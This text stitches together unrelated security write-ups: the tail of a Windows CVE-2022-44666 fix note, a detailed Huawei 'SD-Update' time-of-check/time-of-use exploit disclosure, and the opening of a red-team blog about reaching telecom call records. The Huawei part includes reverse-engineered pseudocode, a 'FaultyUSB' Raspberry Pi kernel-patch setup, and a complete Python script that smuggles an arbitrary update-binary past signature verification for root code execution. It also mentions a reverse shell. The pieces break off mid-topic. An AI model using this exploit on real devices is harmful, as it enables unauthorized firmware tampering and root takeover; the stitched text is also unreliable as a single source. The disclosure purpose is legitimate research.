The function «IsInternetAddress» was intentionally created to check if the href attr corresponds to any email address. So my proposed fix (and following the imported functions that the library uses) would be:
...
if (v32 && !(unsigned int)StrCmpNICW(L"mailto:", v23, 7i64)) // Check out the href really starts with "mailto:"
{
v30 = v23;
goto LABEL_44;
}
...
So simple like this, it’s only needed to check this out before calling to «SafeExecute». Just testing if the target string (v23) starts with «mailto:», the bug would be fully fixed IMHO.
Unofficial fix
Some days/weeks ago when i contacted @mkolsek of 0patch to inform him about this issue, who by the way is always very kind to me, told me this has been receiving an unofficial fix for Windows 7 since then (4 years ago). That was a surprise and good news!
It was tested and successfully stopped the new variant of CVE-2022-44666. The micropatch prepends «http://» to the attacker-controlled string passed by the href attr if doesn’t start with «mailto:», «http://» or «https://», which is enough to fully fix the issue. Now it’s going to be extended for the latest Windows versions, only necessary to update some offsets.
Either way, it would be better to get an official patch.
Acknowledgments
@hyp3rlinx: Special shout out and acknowledgement because he began this research some years ago and his work was essential for this writeup. He should have been also credited for finding this out but unfortunately i was unable to contact him just in time. It’s already been done (Update 2023/02/08).
Last year we published UnZiploc, our research into Huawei’s OTA update implementation. Back then, we have successfully identified logic vulnerabilities in the implementation of the Huawei recovery image that allowed root privilege code execution to be achieved by remote or local attackers. After Huawei fixed the vulnerabilities we have reported, we decided to take a second look at the new and improved recovery mode update process.
This time, we managed to identify a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in the recovery mode, enabling unauthentic firmware updates, firmware downgrades to a known vulnerable version or other system modifications. Our advisory for the vulnerability is published here.
The story of exploiting this vulnerability was made interesting by the fact that, since the exploit abuses wrong assumptions about the behavior of an external SD card, we needed some hardware-fu to actually be able to trigger it. In this blog post, we describe how we went about creating “FaultyUSB” — a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive — and exploiting this vulnerability to achieve arbitrary code execution as root!
Huawei SD-update: Updates via SD Card
Huawei devices implement a proprietary update solution, which is identical throughout Huawei’s device lineup regardless of the employed chipset (Hisilicon, Qualcomm, Mediatek) or the used base OS (EMUI, HarmonyOS) of a device.
This common update solution has in fact many ways to apply a system update, one of them is the “SD-update”. As its name implies, the “SD-update” method expects the update file to be stored on an external media, such as on an SD card or on an USB flash drive. After reverse engineering how Huawei implements this mode, we have identified a logic vulnerability in the handling of the update file located on external media, where the update file gets reread between different verification phases.
While this basic vulnerability primitive is straightforward, exploitation of it presented some interesting challenges, not least of which was that we needed to develop a custom software emulation of an USB flash drive to be able to provide the recovery with different data on each read, as well as we had to identify additional gaps of the update process authentication implementation to make it possible to achieve arbitrary code execution as root in recovery mode.
Time-of-Check to Time-of-Use
The root cause of the vulnerability lies in an unfortunate design decision of the external media update path of the recovery binary: when the user supplies the update files on a memory card or a USB mass-storage device, the recovery handles them in-place.
In bird’s-eye view the update process contains two major steps: verification of the ZIP file signature and then applying the actual system update. The problem is that the recovery binary accesses the external storage device numerous times during the update process; e.g. first it discovers the relevant update files, then reads the version and model numbers, verifies the authenticity of the archive, etc.
So in case of an legitimate update archive, once the verification succeeds, the recovery tries to read the media again to perform the actual installation. But a malicious actor can swap the update file just between the two stages, thus the installation phase would use a different, thus unverified update archive. In essence, we have a textbook “Time-of-Check to Time-of-Use” (ToC-ToU) vulnerability, indicating that a race condition can be introduced between the “checking” (verification) and the “using” (installation) stages. The next step was figuring out how we could actually trigger this vulnerability in practice!
Attacking Multiple Reads in the Recovery Binary
With an off-the-shelf USB flash drive it is very clear that by considering a specific offset, two reads without intermediate writes must result in the same data, otherwise the drive would be considered faulty. So in terms of the update procedure this means the data-consistency is preserved: during the update for each point in time the data on the external drive matches up with what the recovery binary reads. Consequently, as long as a legitimate USB drive is used, the design decision of using the update file in-place is functionally correct.
Now consider a “faulty” USB flash drive, which returns different data when the same offset if read twice (of course, without any writes between them). This would break the data-consistency assumption of the update process, as it may happen that different update steps see the update file differently.
The update media is basically accessed for three distinct reasons: listing and opening files, opening the update archive as a traditional ZIP file, and reading the update archive for Android-specific signature verification. These access types could enable different modes of exploiting this vulnerability by changing the data returned by the external media. For example, in the case of multiple file system accesses of the same location, the
Accordingly, multiple kinds of exploitation goals can be set. For example by only modifying the content of the
UPDATE.APP
file of the update archive at install time, an arbitrary set of partitions can be written with arbitrary data on the main flash. A more generic approach is to gain code execution just before writing to flash in the
EreInstallPkg
function, by smuggling a custom
update-binary
into the ZIP file.
In the following we are going to use the approach of injecting a custom binary in order to achieve the arbitrary code execution by circumventing the update archive verification.
At this point we must mention a crucial factor: the caching behavior of the underlying Linux system and its effects on exploitability. For readability reasons this challenge is outlined in the next section, so for now we continue with the assumption that we will be able to swap results between repeated read operations.
Sketching out the code flow of an update procedure helps understanding exactly where multiple reads can occur. Since our last exploit) of Huawei’s recovery mode some changes have occured (e.g. functions got renamed), so the update flow is detailed again here for clarity.
First of all, the “SD-update” method is handled by
HuaweiUpdateNormal
, which essentially wraps the
HuaweiUpdateBase
function. Below is an excerpt of the function call tree of
HuaweiUpdateBase
, mostly indicating the functions which interact with the update media or contain essential verification functions.
The functions in square brackets divide the update process into three phases:
Device firmware version compatibility checking
Android signature verification, update type and version checking
Update installation via the provided
update-binary
file
In the first stage the version checking makes sure that the provided update archive is compatible with the current device model and the installed OS version. (The code snippets below are from the reverse engineered pseuodocode.)
The second stage contains most of the complex verification functionality, such as checking the Android-specific cryptographic signature and the update authentication token. It also performs an extensive inspection on the compatibility of the update and the device.
int HuaweiOtaUpdate(int argc, char **argv) {
...
log("%s:%s,line=%d:push HOTA_BEGIN_L0\n","Info","HuaweiOtaUpdate",0x5a6);
...
ret = DoOtaUpdate(argc, argv);
...
}
int DoOtaUpdate(int argc, char **argv) {
... /* tidy the update package paths */
g_totalPkgSz = 0;
for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* The media which contains the update package gets mounted here *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
MountSdCardWithRetry(path_list[pkgIndex],5);
... /* ensuring that the update package does exist */
pkgIndex = pkgIndex + 1;
g_totalPkgSz = g_totalPkgSz + auStack568._48_8_;
} while (pkgIndex < count);
log("%s:%s,line=%d:g_totalPkgSz = %llu\n","Info","DoOtaUpdate",0x45b,g_totalPkgSz);
result = PkgTypeUptVerPreCheck(argc,argv,ProcessOtaPackagePath);
if ((result & 1) == 0) {
log("%s:%s,line=%d:PkgTypeUptVerPreCheck fail\n","Err","DoOtaUpdate",0x460);
return 1;
}
result = HuaweiUpdatePreCheck(path_list,loop_counter,count);
if ((result & 1) == 0) {
log("%s:%s,line=%d:HuaweiUpdatePreCheck fail\n","Err","DoOtaUpdate", 0x465);
return 1;
}
result = HuaweiUpdatePreUpdate(path_list,loop_counter,count);
if ((result & 1) == 0) {
log("%s:%s,line=%d:HuaweiUpdatePreUpdate fail\n","Err","DoOtaUpdate", 0x46b);
return 1;
}
...
for (pkgIndex = 0; pkgIndex < count; pkgIndex++) {
log("%s:%s,line=%d:push HOTA_PRE_L1\n","Info","DoOtaUpdate",0x474);
push_command_stack(&command_stack,3);
package_path = path_list[pkgIndex];
... /* ensure the package does exists */
... /* update the visual update progress bar */
log("%s:%s,line=%d:pop HOTA_PRE_L1\n","Info","DoOtaUpdate",0x48d);
pop_command_stack(&command_stack);
log("%s:%s,line=%d:push HOTA_PROCESS_L1\n","Info","DoOtaUpdate",0x48f);
push_command_stack(&command_stack,4);
log("%s:%s,line=%d:OTA update from:%s\n","Info","DoOtaUpdate",0x491,
package_path);
/* 'IsPathNeedMount' returns true for the SD update package paths */
needs_mount = IsPathNeedMount(package_path_string);
ret = EreInstallPkg(package_path,local_1b4,"/tmp/recovery_hw_install",needs_mount & 1);
... /* update the visual update progress bar */
}
}
int MountSdCardWithRetry(char *path, uint retry_count) {
... /* sanity checks */
if (retry_count < 6 && (!strstr(path,"/sdcard") || !strstr(path,"/usb"))) {
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* USB drives mounted under the '/usb' path, so this path is taken *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
for (trial_count = 1; trial_count < retry_count; trial_count++) {
if (hw_ensure_path_mounted(path))
return 0;
... /* error handling */
sleep(1);
}
log("%s:%s,line=%d:mount %s fail\n","Err","MountSdCardWithRetry",0x8b1,path);
return -1;
}
if (hw_ensure_path_mounted(path)) {
... /* error handling */
return -1;
}
return 0;
}
Finally in the third stage the update installation begins by extracting the
update-binary
from the update archive and executing it. From this point forward, the bundled update binary handles the rest of update process, like extracting the
UPDATE.APP
file containing the actual data to be flashed.
uint EreInstallPkg(char *path, undefined *wipeCache, char *last_install, bool need_mount) {
... /* create and write the 'path' value into the 'last_install' file */
if (!path || g_otaUpdateMode != 1 || get_current_run_mode() != 2) {
log("%s:%s,line=%d:path is null or g_otaUpdateMode != 1 or current run mode is %d!\n","Err","HuaweiPreErecoveyUpdatePkgPercent",0x493,get_current_run_mode());
ret = hw_setup_install_mounts();
} else {
... /* with SD update mode this path is not taken */
}
if (!ret) {
log("%s:%s,line=%d:failed to set up expected mounts for install,aborting\n",
"Err","install_package",0x5b8);
return 1;
}
... /* logging and visual progess related functions */
ret = do_map_package(path, need_mount & 1, &package_map);
if (!ret) {
log("%s:%s,line=%d:map path [%s] fail\n","Err","ReallyInstallPackage",0x575,path);
return 2;
}
zip_handle = mzOpenZipArchive(package_map,package_length,&archive);
... /* error handling */
updatebinary_entry = mzFindZipEntry(&archive,"META-INF/com/google/android/update-binary");
log("%s:%s,line=%d:push HOTA_TRY_BINARY_L2\n","Info","try_update_binary",0x21e);
push_command_stack(&command_stack,0xd);
... /* error handling */
unlink("/tmp/update_binary");
updatebinary_fd = creat("/tmp/update_binary",0x1ed);
mzExtractZipEntryToFile(&archive,update-binary_entry,updatebinary_fd);
EnsureFileClose(updatebinary_fd,"/tmp/update_binary");
... /* FindUpdateBinaryFunc: check the kind of the update archive */
mzCloseZipArchive(&archive);
...
if (fork() == 0) {
...
execv(updatebinary_path, updatebinary_argv);
_exit(-1);
}
log("%s:%s,line=%d:push HOTA_ENTERY_BINARY_L3\n","Info","try_update_binary",0x295);
push_command_stack(&command_stack,0x16);
...
}
int hw_setup_install_mounts(void) {
...
for (partition_entry : g_partition_table) {
if (!strcmp(partition_entry, "/tmp")) {
if (hw_ensure_path_mounted(partition_entry)) {
log("%s:%s,line=%d:failed to mount %s\n","Err","hw_setup_install_mounts",0x5a1,partition_entry);
return -1;
}
}
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Every entry in the partition table gets unmounted except /tmp *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
else if (hw_ensure_path_unmounted(partition_entry)) {
log("%s:%s,line=%d:fail to unmount %s\n","Warn","hw_setup_install_mounts",0x5a6,partition_entry);
if (!strcmp(partition_entry,"/data") && !try_umount_data())
log("%s:%s,line=%d:umount data fail\n","Err","hw_setup_install_mounts",0x5a9);
}
}
return 0;
}
int do_map_package(char *path, bool needs_mount, void *package_map) {
... /* sanity checks */
if (needs_mount) {
if (*path == '@' && hw_ensure_path_mounted(path + 1)) {
log("%s:%s,line=%d:mount (path+1) fail\n","Warn","do_map_package",0x3f0);
return 0;
}
for (trial_count = 0; trial_count < 10; trial_count++) {
log("%s:%s,line=%d:try to mount %s in %d/%u times\n","Info","do_map_package",0x3f5,path,trial_count,10);
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* needs_mount = true, so the USB flash drive gets mounted here *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
if (hw_ensure_path_mounted(path)) {
log("%s:%s,line=%d:try to mount %s in %d times successfully\n","Info","do_map_package",0x3f7,path,trial_count);
return 0;
}
... /* error handling */
sleep(1);
}
... /* error handling */
}
if (sysMapFile(path,package_map) == 0) {
log("%s:%s,line=%d:map path [%s] success\n","Info","do_map_package",0x40a,path);
return 1;
}
log("%s:%s,line=%d:map path [%s] fail\n","Err","do_map_package",0x407,path);
return 0;
}
Based on this flow it is easy to spot that if an update archive gets past the second phase (cryptographic verification), code execution is achieved afterwards because the recovery process would try to extract and run the
update-binary
file of the update archive. Thanks to these multiple reads, the attacker could therefore provide different update archives at each of these stages, so a straightforward exploitation plan emerges:
Version checking stage: construct a valid
SOFTWARE_VER_LIST.mbn
file
Signature verification: supply a pristine update archive
Installation: inject the custom
update-binary
Circumventing Linux Kernel Caching Of External Media
The previous section introduced our “straightforward” exploitation plan.
However, in practice, it does not suffice to just treat the file read syscalls of the update binary as if they could directly result in a unique read request to external media.
The relevant update files are actually
mmap
-ed by the update binary, and the generated memory read accesses get handled first by the file system API, then by the block device layer of Linux kernel, and finally, after all those layers, they get forwarded to the external media. The file system API uses the actual file system implementation (e.g. exFAT) to turn the high level requests (e.g. “read the first
0x400
bytes from the file named
/usb/update_sd_base.zip
”) into a lower level access of the underlying block device (e.g. “read
0x200
bytes from offset
0x12340000
and read
0x200
bytes from offset
0x56780000
on the media”). The block device layer generates the lowest level request, which can be interpreted directly by the storage media, e.g. SCSI commands in case of a USB flash drive.
In addition, the Linux kernel caches the read responses of both the file system API (page cache), and the block devices (block cache, part of the page cache). So at the second time the same read request arrives, the response may be served from cache instead of the storage media, but it depends on the amount of free memory.
Therefore, in the real world, frequent multiple reads of external media normally do not occur thanks to the caching of the operation system. In other words, it is up to the Linux kernel’s caching algorithm when a memory access issued by the recovery binary actually translates into a direct read request to the external media, besides depending heavily on the amount of free memory available. In practice, our analysis showed that the combination of the caching policy and the about 7 GB of free memory (on flagship phones) works surprisingly well, virtually zero reread should be occuring while handling update files, which are at most 5 GB in size, thus they fit into the memory as a whole. So, at first glance, you might think that the Linux kernel’s caching behavior would prevent us from actually exploiting this theoretical ToC-ToU vulnerability. (Un)fortunately, this was not the case!
We can take a step back from caching behavior of normal read operations and look at the functions highlighted in curly brackets in the code flow chart above: those implement the mount and unmount commands. This shows that the file system of the external media is unmounted and remounted between the stages we’ve previously defined! The file cache of Linux kernel is naturally bounded to the backing file system, so when an unmount event happens, the corresponding cache entries are flushed. The subsequent mount command would start with an empty cache state, so the update file must be read again directly from the external media. This certainly and deterministically enables an attacker to supply a different update archive or even a completely new file system at each mount command, thus eventually it can be used to bypass the cryptographic verification and supply arbitrary update archive as per above. Phew 🙂
Creating FaultyUSB
Based on the above, we have an exploit plan, but still what was left is actually implementing our previously discussed “FaultyUSB”: a USB flash drive (USB-OTG mass storage), which can detect the mount events and alter the response data based on a trigger condition. In the following we give a brief, practical guide on how we set up our test environment.
Raspberry Pi As A Development Platform
The Linux kernel has support for USB OTG mass storage device class in general, but we needed to find a computer which has the requisite hardware support for USB OTG, since regular PCs are designed to work in USB host mode only. Of course, Huawei phones themselves support this mode, but for the ease of development we selected the popular Raspberry Pi single-board computer. Specifically, a Raspberry Pi 4B (RPi) model was used, as it supports USB OTG mode on its USB-C connector.
Finally we can put the SD card back into the RPi and connect it to a router via the Ethernet interface. By default, Rasbian OS tries to negotiate an IP address via DHCP and broadcast the
raspberry.local
over mDNS protocol, so at first we simply connected to it over SSH via the previously configured username and password. But we didn’t find the DHCP reliable enough actually, so we decided to use static IP address instead:
“Raspberry Pi OS Lite (64bit) (2022.04.04.)” is used as a base image for the RPi, and written to an SD card. The size of the used SD card is indifferent as long the OS fits it, approx. minimum 2GB is recommended.
Writing the image to the SD card is straightforward:
Then we mount the first partition and create a user account file and the configuration file and we also enable the SSH server. The
userconf.txt
file below defines the
pi
user with
raspberry
password. The config file disables the Wi-Fi and the Bluetooth to lower power usage, and also configures the USB controller in OTG mode. The command line defines the command to load the USB controller with the mass storage module.
The power supply of the Raspberry Pi 4B proved to be problematic for this particular setup. It can be powered either through the USB-C connector or through dedicated pins of the IO header, and it requires a non-trivial amount of power, about 1.5 A. In case of supplying power from the IO headers, the regulated 5 V voltage also appears on the VDD pins of the USB-C, and by connecting it to a Huawei phone it incorrectly detects the RPi being in USB host mode instead of the desired OTG mode. As it turned out the USB-C connector on the RPi is not in fact fully USB-C compatible…
Luckily, the tested Huawei phones can supply enough power to boot the RPi. However, it takes about 8-10 seconds for the RPi to fully boot up and Huawei phones shut the power down while rebooting into recovery mode. Obviously, this means that the RPi shuts down for lack of power, and the target Huawei phone only enables the power over USB-C when it has been already booted into recovery mode. That’s why it is possible (and during our devlopment this occured several times) that the RPi misses the recovery’s timeout window of waiting for an USB drive, simply because it can’t boot up fast enough.
One way to solve this problem is to boot the phone into eRecovery mode, by holding the Power and Volume Up buttons, because that way the update doesn’t begin automatically, thus giving some time for the RPi to boot up. But we wanted to support a more comfortable way of updating, from the “Project Menu” application, “Software Upgrade / Memory card Updage” option, which results in automatic update of the archive without waiting for any user interaction.
Our solution was to power the RPi via a USB-C breakout board via a dedicated power supply adapter. Also the breakout board passes through the data lines to the target Huawei phone, but the VDD lines are disconnected (i.e. the PCB traces are cut) in the direction of the phone to prevent the RPi to be recognized as a host device. With this setup the RPi can be powered independently of the target device and it can be accessed over SSH via the Ethernet interface regardless of the power state of the target Huawei phone.
To further tweak the OS boot time and power consumption, we disable a few unnecessary services:
By further optimizing the power consumption, we disabled as much as we can from the currently unnecessary GPU subsystem. To avoid premature write-exhaustion of the SD card we disable persisting the log files, because we are about to generate quite a few megabytes of them.
Finally we restart the RPi, verify that it is still accessible over SSH and shut it down in preparing of a kernel build.
Kernel Module Patching
The main requirement of the programmable USB OTG mass storage device is the ability to detect the update state, so that it can serve different results based on current stage. The most obvious place to implement such feature is directly in the mass storage functionality implementation, which is located at
drivers/usb/gadget/function/f_mass_storage.c
in the Linux kernel.
The crucial feature of FaultyUSB is the trigger implementation, which dictates when to hide the smuggled ZIP file. To implicitly detect the state of the update process a very simple counting algorithm prooved to be sufficient. Specific parts of the file system seem to be only read during mount events, thus by counting mount-like patterns the update stage can be recovered.
While the trigger condition is active, the read responses are modified by masking by zeros. The read address and the masking area size should be configured to cover the smuggled ZIP at the end of the update archive.
We’ve done the kernel compilation off-target, on an x86 Ubuntu 22.04 machine, so a cross compilation environment was needed. Acquiring the kernel sources (we used the
a90c1b9c
) and applying the mass storage patch:
sudo apt install git bc bison flex libssl-dev make libc6-dev libncurses5-dev
sudo apt install crossbuild-essential-arm64
mkdir linux
cd linux
git init
git remote add origin https://github.com/raspberrypi/linux
git fetch --depth 1 origin a90c1b9c7da585b818e677cbd8c0b083bed42c4d
git reset --hard FETCH_HEAD
git apply < ../mass_storage_patch.diff
For kernel config we use the Raspberry Pi 4 specific defconfig. The default kernel configuration contains a multitude of unnecessary modules, they could have been trimmed down quite a bit.
KERNEL=kernel8
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- bcm2711_defconfig
make -j8 ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- Image modules dtbs
After building the kernel, we copy the products to the SD card:
Finally we put the SD card back into the RPi and boot it.
Crafting the Update Archive
Recall that we have three phases of the update process separated by the mount actions: the first one checks software version for compatibility of the update with the device, the second verifies the update cryptographically, the third applies the update. We are going to construct a “frankenZIP” update archive which can presents itself in different ways throughout the update phases using our FaultyUSB to achieve our goal.
It may seem logical at first that in the first two steps (compatibility check, signature verification) we can use the same thing, since we just need a valid update archive that is both signed and has a matching version for the given device. However, the second phase of the update process is actually more convoluted as it performs multiple sub-checks: in addition to the Android-specific update signature verification, there is another important phase of the verification stage, which is the authentication token checking.
The authentication token is a cryptographically signed token, infeasible to forge, but it only applies to the OTA update archives, the SD-type updates are not checked for auth tokens. SD updates are most likely meant to be installed locally, e.g. literally from an SD-card, so there is no Huawei server to be involved in accepting the update process and issuing an auth-token.
It is possible to find an OTA update archive for a specific device, because the end user must be able to update their phone, so there must be a way to publicly access the OTA updates. Unfortunately SD updates are more difficult to find, we only managed to find a few model-version combinations on Android file hosting sites. Analyzing update archives of different types and versions we found that Huawei is using the so-called
hotakey_v2
RSA key in broad ranges of devices as the Android-specific signing key: both an SD update for LIO EMUI 11 and the latest HarmonyOS updates for NOH are signed with this key. This means that an update archive for a different model and older OS version may still pass the cryptographic verification successfully even on devices with a fresh HarmonyOS version.
Also, there are some recent changes in the update archive content: the newer update archives (both OTAs and SDs) have begun to utilize the
packageinfo.mbn
version description file, which is also checked during in the verification stage. If this file exists, a more thorough version-compatibility test is performed: e.g. when it defines an “Upgrade” field and the installed OS has a greater version number than the current update has, the update process is aborted. However, the check is skipped if this file is missing – which is exactly the case with the pre-HarmonyOS updates, e.g. the EMUI 11 SD update archives don’t have the
packageinfo.mbn
file.
Solving on all those constraints eventually we were able to find a publicly available file on a firmware sharing site (named
Huawei Mate 30 Pro Lion-L29 hw eu LIO-L29 11.0.0.220(C432E7R8P4)_Firmware_EMUI11.0.0_05016HEY.zip
), which contains the SD update of LIO-L29 11.0.0.220 version. There are three ZIP files in an SD update: base, preload, and cust package. Each of them are signed. We selected the cust package to be the foundation of the PoC, because of its tiny (14 KB) size.
This file is perfect for the second phase of the update (verification), but it would obviously not have the correct
SOFTWARE_VER_LIST.mbn
for our target devices. That’s why the exploit has to present the external media differently between phases 1 and 2 as well: first we will produce the variant that will have the desired
SOFTWARE_VER_LIST.mbn
, but in the second phase we will produce the previously mentioned SD update archive file for EMUI 11, that passes not only signature verification, but also bypasses the authentication token and the
packageinfo
requirement. However, this original archive file is not used exactly “as-is” for phase two: we must make a change to it so that it still passes verification in phase two while also contains the arbitrary binary to be executed in the third phase (code execution).
Creating such a static “frankenZIP” that can produce multiple contents depending on update stage was the main point of our previous publication — see the UnZiploc presentation on exploiting CVE-2021-40045. The key to it is the way the parsing algorithm of the Android-specific signature footer works. The implementation still enables us to make a gap between the end of the actual ZIP file and the beginning of the whole-file PKCS#7 signature. This gap is a No man’s land in the sense that the ZIP parsers omit it, as it is technically part of the ZIP comment field; likewise the signature verifier also skips it, because the signature field is aligned to the end of the file. However (and this is why we needed a new vulnerability compared to the previous report) statically smuggling a ZIP file inside the gap area would no longer be possible, since the fix Huawei employed, i.e. searching for the ZIP End of Central Directory marker in the archive’s comment field, is an effective mitigation.
This EOCD searching happens in the verification phase, just before the Android-specific signature checking. This means that during the verification phase a pristine update archive must be used (apart from the fact that it is still possible to create a gap between the signature and the end of the ZIP data).
Therefore, the idea is to utilize the patched mass storage functionality of the Linux kernel to hide the injected ZIP inside the update archive exactly when the update process reaches the verification phase. This is done by masking the payload area with zeros, so when a read-access occures at the end of the ZIP file during the EOCD searching phase of verification process, the phone will read zeros in the No man’s land and therefore the new fix will not cause an assertion. However, reading the ZIP file in the third phase, the smuggled content will be provided and therefore (similarly to the previous vulnerability), the modified
update-binary
will end up being executed.
The content of the crafted ZIP file can be restricted to a minimal file set, to only those which are essential to pass the sanity (
META-INF/CERT.RSA
,
SD_update.tag
) and version (
SOFTWARE_VER_LIST.mbn
) checks during the update process. Supported models depend on the content of the
SOFTWARE_VER_LIST.mbn
file, where model codenames, geographical revision, and a minimally supported firmware version are listed. The
update-binary
contains the arbitrary code that will be executed.
Here is the ZIP-smuggling generator (
smuggle_zip_inplace.py
), which takes a legitimate signed ZIP archive as a base and inject into it the previously discussed minimal file set and a custom binary to be executed.
import argparse
import struct
import zipfile
import io
import os
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="poc update.zip repacker")
parser.add_argument("file", type=argparse.FileType("r+b"), help="update.zip file to be modified")
parser.add_argument("update_binary", type=argparse.FileType("rb"), help="update binary to be injected")
parser.add_argument("-g", "--gap", default="-1", help="gap between EOCD and signature (-1: maximum)")
parser.add_argument("-o", "--ofs", default="-1", help="payload offset in the gap")
args = parser.parse_args()
gap_size = int(args.gap, 0)
payload_ofs = int(args.ofs, 0)
args.file.seek(0, os.SEEK_END)
original_size = args.file.tell()
args.file.seek(-6, os.SEEK_END)
signature_size, magic, comment_size = struct.unpack("<HHH", args.file.read(6))
assert magic == 0xffff
print(f"comment size = {comment_size}")
print(f"signature size = {signature_size}")
# get the signature
args.file.seek(-signature_size, os.SEEK_END)
signature_data = args.file.read(signature_size - 6)
# prepare the gap to where the payload will be placed
# (gap is the new comment size - signature size)
if gap_size == -1:
gap_size = 0xffff - signature_size
assert gap_size + signature_size <= 0xffff
# automatically set the payload offset to be 0x1000-byte aligned
if payload_ofs == -1:
payload_ofs = (comment_size - original_size) & 0xfff
print(f"gap size = {gap_size}")
print(f"payload offset = {payload_ofs}")
# trucate the ZIP at the end of the signed data
args.file.seek(-(comment_size + 2), os.SEEK_END)
end_of_signed_data = args.file.tell()
args.file.truncate(end_of_signed_data)
# write the new (original ZIP's) EOCD according to the updated gap size
args.file.write(struct.pack("<H", gap_size + signature_size))
# gap before filling
args.file.write(b"\x00"*(payload_ofs))
# write a marker before the injected payload
args.file.write(b"=PAYLOAD-BEGIN=\x00")
# generate the injected ZIP payload
z = zipfile.ZipFile(args.file, "w", compression=zipfile.ZIP_DEFLATED)
# ensure the CERT.RSA has a proper length, the content is irrelevant
z.writestr("META-INF/CERT.RSA", b"A"*1300)
# the existence of this file make authentication tag verification skipped for OTA
z.writestr("skipauth_pkg.tag", b"")
# get the update binary to be executed
z.writestr("META-INF/com/google/android/update-binary", args.update_binary.read())
# some more files are necessary for an "SD update"
known_version_list = [
b"LIO-LGRP2-OVS 102.0.0.1",
b"LIO-LGRP2-OVS 11.0.0",
b"NOH-LGRP2-OVS 102.0.0.1",
b"NOH-LGRP2-OVS 11.0.0",
]
z.writestr("SOFTWARE_VER_LIST.mbn", b"\n".join(known_version_list)+b"\n")
z.writestr("SD_update.tag", b"SD_PACKAGE_BASEPKG\n")
z.close()
# write a marker after the injected payload
args.file.write(b"==PAYLOAD-END==\x00")
payload_size = args.file.tell() - (end_of_signed_data + 2) - payload_ofs
assert payload_size + payload_ofs < gap_size, f"{payload_size} + {payload_ofs} < {gap_size}"
# gap after filling
args.file.write(b"\x00"*(gap_size - payload_ofs - payload_size))
# signature
args.file.write(signature_data)
# footer
args.file.write(struct.pack("<HHH", signature_size, 0xffff, gap_size + signature_size))
Regarding the actual content of the PoCs: because a mass storage device has no immediate understanding on higher levels, like file system or even files, it can only operate on raw storage level, so the output of the PoCs should be in fact a raw file system image. Here is below the file system image generation script, where the
update_sd_base.zip
archive is the
cust
part of the aformentioned LIO update and the
update-binary-poc
the ELF executable to be run. The
update-binary-poc
is the static aarch64 ELF file, which finally gets
execve
by the recovery, thus reaching arbitrary code execution as root. Also note that the output image (
file_system.img
) only contains a pure file system, and has no proper partition table.
The file systems are tiny, just about 10 MB in size and formatted in exFAT. To have a proper offset-distance between the file system metadata (e.g. the file node descriptor) and the actual update archive, a 1 MB zero filled dummy file is inserted first. This is only a precaution to avoid the Linux kernel to cache the beginning of the update archive when it reads the file system metadata part.
The final step of the PoC build process automatically constructs a command which can be used to set the patched mass storage device parameters with the correct trigger and payload parameters. The trigger condition is defined as a read event at file decriptor of the
update_sd_base.zip
file, because the file path of the update archive must be resolved into a file node by file system, so the file metadata must be read before the actual file content. Also the trigger counter parameter is empirically set as a constant based on the observed number of mount events, directory listings and file stats prior to the verification stage.
Leveraging Arbitrary Code Execution
Gaining root level code exec is nice and normally one would like to open a reverse shell to make use of it, but the recovery mode in which the update runs leaves us a very restricted environment in terms of external connections. However, as we already detailed in the UnZiploc presentation last year, the recovery mode by design can make use of WiFi to realize a “phone disaster recovery” feature, in which it download the OTA over internet directly from the recovery. So we could make use of the WiFi chip to connect to our AP and thus make the reverse shell possible. The exact PoC code is not disclosed here, it is left as an exercise for the reader 🙂
Running the PoC
After building the PoC the resulting file system image file is transferred to the Raspberry Pi and then loaded as the USB mass storage kernel module on the RPi, e.g.:
Then we connect the RPi with the target phone with the USB-C cable and simply trigger the update process. This can be done in different ways, depending on the lock state of the device.
If the phone is unlocked (i.e. you are trying to root your own phone :), once the phone recognizes the USB device, a notification appears and the file explorer now can list the content of our 10 MB emulated flash drive. Then the dialer can be used to access the ProjectMenu application by dialing
*#*#2846579#*#*
(or in case of a tablet use the calculator in landscape mode and write
()()2846579()()
), then select “4. Software Upgrade”, and then “1. Memory card Upgrade”.
More interestingly, if the phone credentials are not known, so the screen can’t be unlocked to access the ProjectMenu application, the SD update method is still reachable via the eRecovery menu, by powering the phone on while by pressing the Power and Volume Up buttons.
Because the trigger counter can be in an indefinite state after the normal mode Android read the external media, it is very important to execute the same kernel module unloader and loader command again while the phone reboots! This way the trigger counter is only affected by the update process, thus it works correctly.
The update process itself should be fairly quick, as the whole archive is just a few KBs, so the PoC code gets executed shortly, in a few seconds, after entering the recovery mode.
To close things out, here is a video capture of the exploit 🙂
TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network to get for internal network scan. Got access to CDRs and VLR with SS7 application.
Hi everyone, this is my first post on Medium and I hope you guys enjoy reading it! There is a lot of information that I had to redact because of the sensitive nature of this info. (I’m apologizing in advance 😅 )
Introduction
So there I was doing a Red Team Engagement for a client a while back. I was asked to get inside the network and reach to the Call Data Records (CDRs) for the telecom network. People who don’t know what CDR is, here’s a good explanation for it (shamelessly copied from Wikipedia) —
A call detail record (CDR) is a data record produced by a telephone exchange or other telecommunications equipment that documents the details of a telephone call or other telecommunications transaction (e.g., text message) that passes through that facility or device. The record contains various attributes of the call, such as time, duration, completion status, source number, and destination number.
In all my other engagements, this holds a special place. Getting the initial foothold was way too easy (simple network service exploitation to get RCE) but the issue was with the stable shell.
In this blog post (not a tutorial), I want to share my experience on how I went from a Remote Code Execution (RCE) to proxified internal network scans in a matter of minutes.
Reconnaissance
Every ethical hacker/penetration tester/bug bounty hunter/red teamer knows the importance of Reconnaissance. The phrase “give me six hours to chop down a tree and I will spend the first four sharpening the axe” sits perfectly over here. The more extensively the reconnaissance is done, the better odds for exploitation is.
